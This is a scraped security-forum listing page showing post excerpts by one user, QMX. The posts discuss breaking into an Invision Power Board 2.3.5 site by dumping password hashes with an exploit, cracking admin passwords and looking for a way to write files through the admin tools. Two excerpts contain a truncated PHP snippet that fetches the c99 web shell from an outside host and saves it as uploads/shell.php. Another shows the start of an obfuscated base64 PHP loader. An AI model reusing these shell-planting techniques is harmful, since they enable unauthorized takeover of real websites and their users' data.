  | 
        
  | 
   
 
    
        
      
          | 
  
  
  
    
    
        
	  | 
	Menu | 
	  | 
 
 
    
     
     
     
      
       
       
        
         
         
          
           
						 |  
						 Home |  
 |   |  
						 |  
						 Discussions |  
 |   |  
						 |  
						 Tools |  
 |   |  
						 |  
						 Affiliates |  
 |   |  
						 |  
						 Content |  
 |   |  
						 |  
						 Info |  
 |   |    | 
            
          
         | 
       
     
    | 
    
   
   | 
   
 
 | 
   
 
  
    
    
        
	  | 
	User Info | 
	  | 
 
 
    
     
     
     
      
       
       
        
         
         
          
             Membership: 
  Latest: MichaelSnaRe 
  New Today: 0 
  New Yesterday: 0 
  Overall: 9144 
 
  People Online:
 
  Visitors: 85 
  Members: 0 
  Total: 85 
 | 
            
          
         | 
       
     
    | 
    
   
   | 
   
 
 | 
   
 
  
    
    
        
	  | 
	Full disclosure | 
	  | 
 
 
    
 | 
   
 
 | 
  
    
        
	  | 
	 | 
	  | 
 
 
    
        
          
              
                
                    
                      
                          
                            
                            
	
	
		  | 
		 | 
	 
	
		  | 
		IT Security and Insecurity Portal | 
	 
	 
	 | 
 
 
 
	 | 
 
	
	
		
		
			
			
				
				| QMX |  
				 |  
				| Replies: 6 |  
				| Views: 18459 |  
				  | 
			 
			 
 
  | 
			  | 
		 
		
			  | 
			  | 
		 
		 
 
  | 
		
		
			//First part is BASE64
 if(!0)$O000O0O00=fopen($OOO0O0O00,'rb');fgets($O000O0O00,1024);fgets($O000O0O00,4096);$OO00O00O0=(base64_decode(strtr(fread($O000O0O00,372),'wordpesthmDEMHTSRPOWAaBbCcFfGgIiJjK ... | 
		 
		  | 
	 
	  | 
 
 
	 | 
 
	
	
		
		
			
			
				
				| QMX |  
				 |  
				| Replies: 9 |  
				| Views: 34190 |  
				  | 
			 
			 
 
  | 
			  | 
		 
		
			  | 
			  | 
		 
		 
 
  | 
		
		
			The problem is not the IPB version.
 
 There is two different types of Admin users in IPB. 
 
 Root admin- (usually UID 1- has complete access to the board/SQL tools)
  ^---- I don't have this access. ... | 
		 
		  | 
	 
	  | 
 
 
	 | 
 
	
	
		
		
			
			
				
				| QMX |  
				 |  
				| Replies: 9 |  
				| Views: 34190 |  
				  | 
			 
			 
 
  | 
			  | 
		 
		
			  | 
			  | 
		 
		 
 
  | 
		
		
			Ok, This does work. I tried it in a test IPB Install. BUT.. You must execute it as a root admin or else it wont work.
  
 $linky="http://www.evilc0der.com/c99.txt";
 $saved="/home/p ... | 
		 
		  | 
	 
	  | 
 
 
	 | 
 
	
	
		
		
			
			
				
				| QMX |  
				 |  
				| Replies: 3 |  
				| Views: 12820 |  
				  | 
			 
			 
 
  | 
			  | 
		 
		
			  | 
			  | 
		 
		 
 
  | 
		
		
			| It doesn't look like Admin scripts in IPB have write rights. Is there any way to read a file from the TOOLS & SETTINGS (example: conf_global.php) | 
		 
		  | 
	 
	  | 
 
 
	 | 
 
	
	
		
		
			
			
				
				| QMX |  
				 |  
				| Replies: 3 |  
				| Views: 12820 |  
				  | 
			 
			 
 
  | 
			  | 
		 
		
			  | 
			  | 
		 
		 
 
  | 
		
		
			I tried everything posted there. 
 
 Maybe I'm doing something wrong in TOOLS & SETTINGS?
 
 
 In Create New Board Setting is there anything special that needs to be inputted in there other then R ... | 
		 
		  | 
	 
	  | 
 
 
	 | 
 
	
	
		
		
			
			
				
				| QMX |  
				 |  
				| Replies: 3 |  
				| Views: 12820 |  
				  | 
			 
			 
 
  | 
			  | 
		 
		
			  | 
			  | 
		 
		 
 
  | 
		
		
			Great forum guys, I just found it     
 
 Here's the scenerio:
 
 
 IPB 2.3.5
 
 Dumped hashes/salts using that latest sploit >>Passwords Pro>>
 Yielded some admin passwords (but not root ... | 
		 
		  | 
	 
	  | 
 
 
	 | 
 
	
	
		
		
			
			
				
				| QMX |  
				 |  
				| Replies: 9 |  
				| Views: 34190 |  
				  | 
			 
			 
 
  | 
			  | 
		 
		
			  | 
			  | 
		 
		 
 
  | 
		
		
			I've seen this posted here:
 
 $linky="http://www.evilc0der.com/c99.txt";
 $saved="/home/path/towhatever/forum/uploads/shell.php";
 $from=fopen("$linky","r&q ... | 
		 
		  | 
	 
	  | 
 
 
  
	| Page 1 of 1 | 
	 All times are GMT | 
   
 
  
Powered by phpBB © 2001-2008 phpBB Group
 
  
 
 
 | 
                           
                         
                         | 
                     
                    | 
               
              | 
         
       
       | 
   
  | 
 
 
 |